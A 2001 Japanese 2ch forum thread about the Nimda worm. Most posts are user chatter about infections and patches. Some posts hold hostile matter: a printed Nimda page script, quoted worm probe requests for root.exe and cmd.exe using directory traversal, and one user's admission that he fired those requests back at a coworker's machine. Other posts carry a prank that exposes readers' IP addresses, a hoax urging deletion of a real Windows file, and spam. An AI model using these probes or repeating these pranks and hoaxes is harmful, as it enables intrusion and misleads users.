nimdaにやられちゃった人いる?
2 :
名無し~3.EXE:01/09/19 21:46
nimdaってなに?
3 :
名無し~3.EXE:01/09/19 21:48
admin(政府)
ニダ
>>3 どっかにスレに朝鮮人(ニダ)犯行説となえてたアフォがいたな(w
6 :
名無し~3.EXE:01/09/19 21:52
板違い。セキュリティ板に池。
MSNウイルスから完全にCPUを守るソフトをダウンロードできるサイトがあります。
ただし特殊なソフトにつき普通にリンクを張ることはできません。
ダウンロードの方法は
1.書き込みの名前の欄に
http://fusianasan.2ch.net/ と入れる。(裏ドメイン名)
2.E-mail欄に、msn virus killerと入力する。(ログオン)
3.本文に「ウイルス 逝ってよし」を入れて(パスワード)、書込みボタンを押します。
4.タイトルが「ウイルスバスターダウンロード」に変わればOK!
5.サーバーが重いと2chに戻ってくるけど、くじけずに何度も挑戦!
うまく行くと、目的のページにつながります。
6.家庭の電話回線よりも、企業や学校の専用回線からの方がサーバートラフィックの
都合上つながる確立が高いです。
(注意!)全て半角で入れること!!
23:00〜03:00の間はつながり難いです!何度もトライ!
http://fusianasan.2ch.net/←は、裏ドメインの為「直リン」で飛んでも
「鯖が見つかりません」になります。入り口は「表2ch」のCGIだけです。
ウイルス逝ってよし
ウイルス 逝ってよし
nimda nimda
すっかりやられた・・・
14 :
名無し~3.EXE:01/09/19 23:13
国際サイバーテロ説があるな。
15 :
名無し~3.EXE:01/09/19 23:17
なんでお前らSP2にしとかなかったの?
何ヶ月か前に出たのに
WindowsUpdate使っても5.5SP1のまんまなんだよね・・・
17 :
名無し~3.EXE:01/09/19 23:21
まあ、HD全部消すようなやつじゃなくて良かったね
18 :
名無し~3.EXE:01/09/19 23:32
/ ̄ ̄ ̄ ̄ ̄
| 神様教えてください。IE6.0入れようかまよっています。
,__ | 今はIE5.5SP1です。どうか道をおしめしください。
/ ./\ \_____
/ ./( ・ ).\ o〇 ヾ!;;;::iii|//"
/_____/ .(´ー`) ,\ ∧∧ |;;;;::iii|/゙
 ̄|| || || ||. |っ¢..|| ̄ (,, ) ナムナム |;;;;::iii|
|| || || ||./,,, |ゝ iii~ ⊂ ヾwwwjjrjww!;;;;::iii|jwjjrjww〃
| ̄ ̄ ̄|~~凸( ̄)凸 .( ,,)〜 wjwjjrj从jwwjwjjrj从jr
nIMDA は nVIDIA と関係ありますか?
>>18 6は結構良いよ。エロ画像よく見るなら画像の縮小機能がいい感じ。
22 :
房戯袴 ◆YPrWb4fw :01/09/20 00:10
やられました。
あ、トリップ間違えた。こっちだ。
24 :
名無し~3.EXE:01/09/20 00:15
/ ̄ ̄ ̄ ̄ ̄
| 神様教えてください。IE6.0入れようかまよっています。
,__ | 漏れも5.5sp1で安定してました
/ ./\ \_____
/ ./( ・ ).\ o〇 ヾ!;;;::iii|//"
/_____/ .(´ー`) ,\ ∧∧ |;;;;::iii|/゙
 ̄|| || || ||. |っ¢..|| ̄ (,, ) ナムナム |;;;;::iii|
|| || || ||./,,, |ゝ iii~ ⊂ ヾwwwjjrjww!;;;;::iii|jwjjrjww〃
| ̄ ̄ ̄|~~凸( ̄)凸 .( ,,)〜 wjwjjrj从jwwjwjjrj从jr
26 :
名無し~3.EXE:01/09/20 06:32
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
,__ | 神様おぼしめしのとおりIE6入れました。とりあえず良かったみたいです。
/ ./\ \_____________________
/ ./( ・ ).\ o〇 ヾ!;;l;::lilii|//"
/_____/ .(´ー`) ,\ ∧∧ |;;l;;::|liii|/゙
 ̄|| || || ||. |っ¢..|| ̄ (,, ) ナモナモ |;;l;;::||iii|
|| || || ||./,,, |ゝ iii~ /■\ ⊂ ヾ.. |;;|;l;::i|ii|
| ̄ ̄ ̄|~~凸( ̄)凸( .).(゙ ,,,)〜 wjwjjrj从jwwjwjjrj从jr
゙゙""""゙゙"""""""""""""""""""""""""゙゙ ゙゙゙ ゙゙゙゙゙゙゙ ゙゙゙
IE4.0だし、、、。
28 :
名無し~3.EXE:01/09/20 09:13
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない?
見ただけで勝手に何かを実行するなんて言う考えは
根本的に間違い。
こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい。
で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。
ウイルス 逝ってよし
30 :
名無し~3.EXE:01/09/20 10:00
>>28 つまらん戯言ぬかしてるヒマあったら
自慢のヒビ入りキューブでも見てオナってなさい(プ
31 :
名無し~3.EXE:01/09/20 10:08
キューブやゲロ柄の愛マックラッシュは最低最悪だった。
はっはっはっ、ザマーネーナ(藁
33 :
名無し~3.EXE:01/09/20 10:14
34 :
名無し~3.EXE:01/09/20 10:27
ジョブスが自殺しそうで心配だ、、、。
>>30 残念でしTA!
俺はFreeBSDさ。
全く、馬鹿Winユーザーのせいでアタックが多いYO!
36 :
名無し~3.EXE:01/09/20 15:45
漏れのPC100ギガ。にむだ60ギガ
元気ですか?
はじめまして、ひとみでーす。
突然ですが、最近、どーも「日照り」が続いてるのよね。
あーっ、どっかにいい男、いないかなーっ、なーんて
思ったりしちゃってる今日この頃。
ってゆーワケで、アナタにお手紙しちゃったって感じです。
ブシツケなメールかもしれないけど、許してね。
いらないならゴミ箱にポイして下さいね。
私がどんなヒトかとゆーと、看護婦をしてるんだけど、
諸般の事情(涙)でこんなサイトの
運営をお手伝いしてるヒトなんです。一度見に来て頂戴ね。
http://www.net-gang.com/girls/hfriend/ お時間がある方はぜひ一度ヨロシク。
p.s.私はどこにいるでしょう? よーく探してね!!
間違って届いちゃった人は、下の所でメアド削除してね。
http://nomail.whiteshower.com/
38 :
名無し~3.EXE:01/09/20 16:04
ウイルス 逝ってよし
40 :
M$N からのお知らせ:01/09/20 16:59
平素より MSN をご利用いただき、まことにありがとうございます。
9 月 18 日夜 11 時より、MSN(
http://www.msn.co.jp/)において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。
自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
これ以外のブラウザを利用されている方は、MSN(
http://www.msn.co.jp/)にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。
「Nimda」には以下の機能があります。
1. 電子メールによって「Nimda」を配付
2. ネットワーク不の他のコンピューターに「Nimda」をインストール
3. インターネット不のサーバーにアクセスして、可能であれば「Nimda」をインストール
尚、「Nimda」のアンインストールには以下のソフトウェアが必要です。
トレドマイクロ社(
http://www.trendmicro.co.jp/)ウイルスバスター2002
シマンテック社(
http://www.symantec.co.jp/)ノートン・アンチウィルス 2002
「Nimda」は Windows 95/ 98 / Me / NT / 2000 でご利用いただけます。
MSN(
http://www.msn.co.jp/)は、月間ユニークユーザー数1600万人(2001年7月)を誇る
日本で有数のウイルスポータルサイトです。今後ともよろしくお願いします。
42 :
名無し~3.EXE:01/09/21 00:21
今日、なんかネット全体が重くない?
プロバイダのODNが悪いのかな。
44 :
名無し~3.EXE:01/09/21 00:39
>MS、セキュリティ機能をアップしたWindows XPを前倒し出荷!
ここんとこのワームって
何だかMSとシマンテックの自作自演っぽいよねえ?
タイミングが合い過ぎ…^^
46 :
名無し~3.EXE:01/09/21 01:22
lynx -source
http://210.135.201.16/ | grep readme
<html>
<script language="JavaScript">
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
</script>
</html>
∩
| |
| |
| |
| |
∧_∧ | | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ´Д`)/ / < ノートン先生!JS.Exception.Exploitです
/ / \_______________
/ /| /
__| | .| |
\  ̄ ̄ ̄ ̄ ̄ ̄ ̄\
||\ \
||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
|| || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|| ||
>>46 JavaScriptを切っておけばおっけいってことなんだ?
なんだか良くわからねーや、まぁヨシとするか?
49 :
ニダウィルス:01/09/21 02:42
∧∧
<`∀´>
≡
/\≡/\
│
50 :
名無し~3.EXE :01/09/21 02:56
今やっとSP2ダウンロード出来た。
一日目、NimadaパニックでWindows UP DATEが混み合っていて、
ほんの僅かしかダウウンロード出来ず中断。
二日目、半分以上ダウンロードできたがそこで中断。
深夜である現在まで起きてようやく完了。
Nimadaもラディンの仕業か?
だったら、許せんから俺は兵役に志願してやるぞ。
51 :
名無し~3.EXE:01/09/21 04:04
しかしWindowsXPでこうゆうことになったらどうなんだろ。
今回みたいな再インストールしなければならんのワームが猛威をふるったら、
アクティベーションの電話パンクしてパニックかも。
おれも
>>43と同様に
妙に重いんだが…
ZoneAlarmには何もかかってないから
ウイルスが何かしてるとは思えない?
ちなみに駆除ソフトが古く、
かつプリインストールなのでアップデートできず、
namdaに対応していないのでわからん。
54 :
名無し~3.EXE:01/09/21 05:18
>>53 今夜は確かに重かった。重くなったり軽くなったり。
お。
>>54 レスありがと。
IEだけじゃなく
かちゅ〜しゃで2ちゃんのログ読み込みも重かったよね?
とりあえずreadme.*で検索してそれらしいファイルはまったくなかったので
感染はしてないと思う。
ところでZoneAlarmって常駐させてなくても
登録していないソフトはネットにアクセスできなくなるのだが。
例えば新しくタブブラウザ入れて
そのままだとネットに繋がらない。(ZoneAlarm起動していないのに)
わざわざZoneAlarmを起動してそのソフトを許可しないと繋がらない。
これってどういう仕組みなんだろう?
わかるヒトいたらレスください。
スタートアップに登録しているというオチはありません。
56 :
名無し~3.EXE:01/09/21 05:36
57 :
ウイルスバスターも入っているが:01/09/21 07:29
2chのお陰でIE5.01SP2を数ヶ月前に導入済み。
私にとっては、今回は対岸の火事。
58 :
名無し~3.EXE:01/09/21 16:53
「nimda」って、
「admin」の逆さま。
59 :
名無し~3.EXE:01/09/21 17:06
60 :
名無し~3.EXE:01/09/21 18:44
62 :
名無し~3.EXE:01/09/21 18:56
>>55 スレ違いだが、ZoneAlarmはある意味危険。
終了すればインターネットに繋がらなくなるし、アンインストールしてもインターネットに繋がらない。
そういうわけで漏れはアタックを承知の上で使うのをやめた。
64 :
名無し~3.EXE:01/09/21 20:31
>63
そんなことはないと思うけど。
少なくとも自分の環境(Win98SE)では終了してもネットにつなげるし、アンインストしても問題は起こらない。
>>55みたいな現象は初めて聞いたよ。
>64はグロ画像
>>65 うちはWin2kだけど、Win2kだとサービス起動だから、
ZoneAlarm終了させるとインターネットにアクセスできなくなる。
アンインストールの場合はそのサービスもアンインストールされるから大丈夫だけど。
>>66 ヒドイ!そんなふうに言わなくたって!(ノ_;)
>>56 ありがと。DLしてみたよ
ちなみにベクターにあるのは日付が古かったので
これから使いたいヒトは作者(会社)のページから落とした方がいいです。
ちなみに企業のHPでディレクトリ見えてるのって初めてだった。ちょいまぬけ。
>>63と
>>67は同じヒトかな?
Windows2000だとZoneAlarmはNGのようですね。
Windows98SEでは起動して許可したソフトは問題なく接続できるので
あたらしいソフトを入れた際に忘れていると困る程度です。
>>65 終了してても許可済みのは大丈夫です
ただ、新しく入れたソフトやディレクトリを移動させたりしたソフトで
未許可だと、何故かZoneAlarmが動いてないのに繋がらないというだけです。
(そこが不思議なんですが)
ZoneAlarm入れてると
メディアプレーヤーとかが勝手に情報送ってるっぽいのがわかったり
韓国とかイスラエルからのお客さんが来たのがわかったりして
面白かったのでそのままつかってます。
ルーター使い始めたので、もう入れてても意味は無かったりするんですが
70 :
名無し~3.EXE:01/09/22 12:31
71 :
名無し~3.EXE:01/09/23 02:02
WORDの初期起動が遅くなった人いない?
Win起動後、初めてWORDファイルを開くと。
100kbも行かないファイルが、読込に30秒ぐらいかかるんだけど。
2回目以降は変わんないんだよね。
Nimdaに感染したPCで多発してるんだけどさ。
ニムダは韓国の文化二ダ!
日本は反省しる!
変わんない→即開くことが出来る です・・・。
74 :
名無し~3.EXE:01/09/23 02:23
ふしぎと会社ではぜんぜん被害なかった。
サーカムも問題ないし。
社内のPCをすべてIE6にするのはつらかった・・
>>72 nimdaを逆から読んでみな、厨房クン(w
78 :
名無し~3.EXE:01/09/23 23:18
IE4.01SP1なんだけどやばいかな?
Windows98なので、IE4がいちばんサクサク動くんだよね。
だからIE5はいれたくないんだけど、
IE4.01のSP2ってもうDLできないんだよねぇ。
困ったなぁ、ネスケにするかなぁ〜
80 :
名無し~3.EXE:01/09/24 03:32
>>74 へ? IE6は感染するってMSが言ってるよ
---
当のMSがインストールの仕方如何で「Nimda ワーム の影響を受ける恐れのある製品 」と公認しているIE6を勧める気にはなれない。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp Nimda ワーム の影響を受ける恐れのある製品
:
: ρ(^-^)インストールのやり方次第ということ
MicrosoftR Internet Explorer 6 (最小構成時のみ)
---
MicrosoftR Internet Explorer 6 は、MS公認の Nimda ワーム の影響を受ける恐れのある製品 であります。
81 :
名無し~3.EXE:01/09/24 08:53
IE5.5 SP2のセットアップファイルって、全てをダウンロードできないの?
分かりやすくいえば、雑誌の付録についている形式で。
セットアップの部分だけダウンロードして実行し、必要なファイルだけ
その時にダウンロードする形式みたいなんだけど・・・。
一瞬、「nimdaにふられちゃいました・・・」
かとオモテしまった。
83 :
名無し~3.EXE:01/09/24 09:13
Linuxer だけど何か?
で、これは感染すると自分のコピーをばらまく以外に何をするの?
>>85 コピーをばらまくので、不要なパケットが飛び交う。
ポート80のアクセスがウザイ。
× ポート80のアクセス
○ ポート80へのアタック
88 :
名無し~3.EXE:01/09/24 21:00
89 :
名無し~3.EXE:01/09/24 22:25
うおっ、
81へ書いたつもりが、84にしてしまった・・・
しかも、81も「IE5.5sp2」って書いてる。。。
ミスった。。。。
91 :
名無し~3.EXE:01/09/25 06:19
92 :
名無し~3.EXE:01/09/26 11:02
93 :
名無し~3.EXE:01/09/26 11:24
なんか2chウイルスとかいうのが
出回ってるらしいよ。
インターネットエクスプローラで
sage.exeとかいうのを検索してそれがあるなら
感染してるらしいです。
94 :
名無し~3.EXE:01/09/26 11:26
>>93 手垢まみれのネタです。
sage.exeのプロパティ
Task Scheduler Sage Compatibility
会社名 Microsoft Corporation
言語 日本語
正式ファイル名 sage.exe
製品バージョン 4.71.1972.1
製品名 Microsoft(R) Windows(R) Task Scheduler
内部名 TaskScheduler
>>93 げげっ 検索したら見つかっちゃった。
どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。どーしよう。
すぐに削除しなさい。
削除できなかったらすでに感染してるということだから、
MS-DOSで消すこと。
97 :
名無し~3.EXE:01/09/27 13:16
sage.exe削除したぞ。もう大丈夫だ(´Д`)
98 :
名無し~3.EXE:01/09/27 17:58
telnet://210.151.237.34
ぷっ。ひでー
99 :
名無し~3.EXE:01/09/27 19:43
悩屯先生、またあたらしいパターンファイル出てるぞー。
100 :
名無し~3.EXE:01/09/27 20:09
nimdaの対応に追われて今週の平均睡眠時間は2h弱。
@MS01-044適用しました。
ASRP適用しました。
BIE5.5SP2適用しました。→結局ダウンロードを選択したら感染するんでしょ?
C共有ディレクトリのアクセス権設定し直しました。
Dウィルスの最新パターンファイルダウンロードしました。
@については7月中に適用しました。
でもCとDが遅かったため
バカなやつが感染してすべてが水の泡でした。
結論:WINはターゲットになりやすい(ウィルス作成者をその気にさせる)。
:バカがいると結局だめ。
:今回はあまりにも対応が遅いシマンテックの自作自演ではなさそう。
:JPCERTはCERTの翻訳版を早く公開しろ。
102 :
名無し~3.EXE:01/09/28 10:09
103 :
名無し~3.EXE:01/09/28 10:10
VOTEこねーなー。だれか送ってくれねーかなー。
104 :
名無し~3.EXE:01/09/28 12:45
105 :
名無し~3.EXE:01/09/28 14:01
ゆうべ ノートンも バスターも パターンファイル更新されたよ。
106 :
名無し~3.EXE:01/09/28 18:11
ノートン 昼にまた パターンファイル更新されたよ。
107 :
名無し~3.EXE:01/09/28 18:30
108 :
名無し~3.EXE:01/09/28 19:00
ハァハァ モット
111 :
名無し~3.EXE:01/09/28 19:29
test
今日もIEの旧バージョンを使いたいというヴァカがいて
めーーーちゃくちゃ頭にきた。
さっさと氏ねヴァーーーカ!!
114 :
名無し~3.EXE:01/09/29 00:21
>>113 ネスケだけで開発していて感染気付かないヴァカ管理者も氏ね!
115 :
名無し~3.EXE:01/09/29 00:37
>>114 ネスケはとっくに全面禁止にしてます。
115>>
うん。すすめる。
117 :
名無し~3.EXE:01/09/29 08:23
ふと思ったけど、ニムダがMSNに感染していたちょうどその時に
初めてパソコン買ったユーザーはどうなったんだろ?
喜び勇んでインターネットしようとしたら、
当然IEのスタートページがMSNだからうむを言わせず感染?!
118 :
名無し~3.EXE:01/09/29 21:21
そーかもね。
119 :
名無し~3.EXE:01/09/29 23:06
>>117 近い例知ってる。
買って(少し使ってから)半年使ってなくて、
久々に使ってURL窓に入れたURLが文字列まちがってて、
検索結果(MSN)が出てきて感染(らしい)
デフォルトはバイオだったのでMSNじゃなかったそうな。
120 :
名無し~3.EXE:01/09/29 23:18
>>1 確か、2chに、ビル・ゲイソさんがいたと思いますが、
貴方はゲイソさんですか?
僕は、ゲイソさんからウイルスを受け取りました。
Hotmail&パッチを組んでいたので良かったー!
あは
122 :
名無し~3.EXE:01/09/30 12:39
123 :
名無し~3.EXE:01/09/30 12:47
126 :
名無し~3.EXE:01/09/30 17:05
127 :
名無し~3.EXE:01/09/30 18:11
ほんとだ、ウイルスがいる!
128 :
名無し~3.EXE:01/09/30 23:35
129 :
名無し~3.EXE:01/10/01 01:39
130 :
名無し~3.EXE:01/10/01 22:38
131 :
名無し~3.EXE:01/10/02 08:24
132 :
名無し~3.EXE:01/10/02 14:59
133 :
名無し~3.EXE:01/10/02 23:29
134 :
名無し~3.EXE:01/10/02 23:50
135 :
名無し~3.EXE:01/10/02 23:50
136 :
名無し~3.EXE:01/10/03 00:10
137 :
名無し~3.EXE:01/10/03 09:50
http://www.with9.com/ 重要なお知らせ
9/18当サーバーは『Nimdaウイルス』感染し、皆様には大変な迷惑と、ご不便をおかけすることなり大変申し訳ございませんでした。
同ウイルスにより、当サーバーは深刻な被害をうけ、現在のサーバーは仮運用となっているため、動作スピードが十分でなない可能性がございます。 早急に完全な状態に復旧する所存ですのでご理解いただけますようお願いいたします。
138 :
名無し~3.EXE:01/10/03 18:30
139 :
名無し~3.EXE:01/10/03 23:13
140 :
名無し~3.EXE:01/10/05 11:55
age
141 :
名無し~3.EXE:01/10/05 20:53
nimdaとは直接関係ないが
IE(5以降)を起動
↓
「ファイル」-「開く」
↓
http://61.136.189.106 と入力
↓
「Webフォルダとして開く」にチェック
↓
OKをクリック
↓
(゚∀゚)アヒャヒャ
143 :
名無し~3.EXE:01/10/05 22:46
144 :
名無し~3.EXE:01/10/08 22:05
145 :
名無し~3.EXE:01/10/08 23:26
146 :
名無し~3.EXE:01/10/09 07:29
147 :
名無し~3.EXE:01/10/09 07:37
148 :
名無し~3.EXE:01/10/09 11:14
Mimuraに穴という穴を突かれてしまいました…
150 :
名無し~3.EXE:01/10/09 12:09
152 :
名無し~3.EXE:01/10/11 18:26
153 :
名無し~3.EXE:01/10/11 19:53
154 :
名無し~3.EXE:01/10/13 22:49
155 :
名無し~3.EXE:01/10/14 02:14
>>155 試しに、ページを保存してみた。
↓ソース
<HTML><BODY><META HTTP-EQUIV="Refresh" CONTENT="0;
http://www.yahoo.co.jp/"></BODY></HTML>
なぜヤフー?
詳しいことわからんけど、
HP制作に詳しい人、説明求む・・・。
157 :
名無し~3.EXE:01/10/15 14:06
>>156 この会社、なんでこんなへんなクラックされてるんだろ?
158 :
名無し~3.EXE:01/10/16 18:38
159 :
名無し~3.EXE:01/10/16 18:56
結局何もなかったから感染しなかったのかな?
160 :
名無し~3.EXE:01/10/17 16:57
161 :
名無し~3.EXE:01/10/17 17:02
162 :
名無し~3.EXE:01/10/17 19:17
LANの中の1台だけ(独立して使うことが多いノートマシン)
感染してました。他のマシンも再インストールするべき?
163 :
名無し~3.EXE:01/10/17 19:57
駆除したはずのニムダが今日急に復活しました。
セーフモードでも立ち上がりません。
すぐにバックアップを取るように、
という警告が出ているのですが、それもできません。
これって、もうダメなんでしょうか?
164 :
名無し~3.EXE:01/10/17 20:27
>>163 駆除後はM$社の最新パッチをあてる必要があります。
やりましたか?
>>164 SP2とIE6を入れてから、駆除したような気がします。
駆除している時も、訳のわからんフォルダからウイルスが発生するので、
そのフォルダごと削除してその場は一件落着。
それから3週間後の出来事でした。もちろん定期的にスキャンかけてました。
その間ネットにはつないでいません。
Cドライブ:プログラムファイル、Dドライブ:データ としているので、
明日にでもCドライブをカスタム再セットアップする予定です。
正解でしょうか?
昨日昼過ぎ、HTTPDを立ち上げたところ
・・・あれ?誰かアクセスして来た。
ごそごそ(ログを漁る)・・・
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:00 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 252
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:01 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:05 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
xx.xxx.xx.xxx - - [16/Oct/2001:14:54:09 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
・・・・・・・・・・
・・・誰だ、俺のPCを攻撃してる奴ァ!!!
ってNimdaかい、このパターンは。
xx.xxx.xx.xxx をトレースすると社内。
あ・れ・ほ・ど小うるさくセキュリティ強化されて
こっちはとばっちり食らってるっーのに、まぁだ
感染する奴がいるのか。
あんまり腹が立ったので、こっそりと別の共用サーバ
とかはしごして足跡ごまかし(姑息)てから TELNETで
"GET /scripts/root.exe?/c+dir HTTP/1.0"
とか一通りぶち込んで差し上げました。
さて、そんなことすっきりと忘れた今日、一通のメール。
「×××××(共用サーバ)がウィルスに感染しました。」
あわわわわ、共用サーバってWindowsでもUNIXでもない上に
LANの中だけのマシンだから「ウィルスに感染」するわきゃ
無いんですね、これが。
そんなわけで、ウィルスになったワタシ。
「感染源」は特定されなかったようです(笑
167 :
名無し~3.EXE:01/10/18 19:51
IEのステータスバーが水色になったんだけどこれってNimdaなの?
既出そうでスマンがNimda感染の症状教えてくり。
168 :
名無し~3.EXE:01/10/19 13:45
>>167 おおざっぱにいうと、自覚症状はない。
他覚症状はあるようだが。
169 :
名無し~3.EXE:01/10/20 17:12
170 :
名無し~3.EXE:01/10/20 17:21
N I M D A
Mをとると
N I D A
ニダ
はてさてMはなにを意味しておるのか
はてさてふむ〜〜
L U N C H
Lを取ると
U N C H
はてさてUNCHはなにを意味しておるのか
はてさてふむ〜〜
174 :
名無し~3.EXE:01/10/23 15:48
>>173 L だけ体内で消化される、という認識でよろしいか?
177 :
名無し~3.EXE:01/10/23 19:33
178 :
名無し~3.EXE:01/10/23 19:38
179 :
名無し~3.EXE:01/10/23 22:24
180 :
名無し~3.EXE:01/10/23 22:32
OS入れ替えるたので(ME→2000)Parlをインストールしたら
ニムダにやられてた・・・また入れ直しです(涙
181 :
名無し~3.EXE:01/10/24 13:27
182 :
名無し~3.EXE:01/10/25 09:57
183 :
名無し~3.EXE:01/10/25 10:00
ニムダには感染できるが、競馬はちがってた。失敬m(_ _)m
184 :
名無し~3.EXE:01/10/25 14:55
185 :
名無し~3.EXE:01/10/25 15:39
186 :
名無し~3.EXE:01/10/26 10:28
よしなさいって!!